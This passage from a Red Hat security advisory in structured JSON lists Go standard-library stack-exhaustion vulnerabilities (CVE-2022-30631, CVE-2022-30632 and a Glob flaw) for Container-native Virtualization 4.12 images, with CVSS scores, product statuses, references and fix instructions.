"url": "https://access.redhat.com/errata/RHSA-2023:0408"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: io/fs: stack exhaustion in Glob"
},
{
"cve": "CVE-2022-30631",
"cwe": {
"id": "CWE-1325",
"name": "Improperly Controlled Sequential Memory Allocation"
},
"discovery_date": "2022-07-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2107342"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. Calling the Reader, Read method on an archive that contains a large number of concatenated 0-length compressed files can cause a panic issue due to stack exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: compress/gzip: stack exhaustion in Reader.Read",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-30631"
},
{
"category": "external",
"summary": "RHBZ#2107342",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107342"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-30631",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30631"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-30631",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30631"
},
{
"category": "external",
"summary": "https://go.dev/issue/53168",
"url": "https://go.dev/issue/53168"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE",
"url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE"
}
],
"release_date": "2022-07-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: compress/gzip: stack exhaustion in Reader.Read"
},
{
"cve": "CVE-2022-30632",
"cwe": {
"id": "CWE-1325",
"name": "Improperly Controlled Sequential Memory Allocation"
},
"discovery_date": "2022-07-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2107386"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This can cause an attacker to impact availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: path/filepath: stack exhaustion in Glob",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
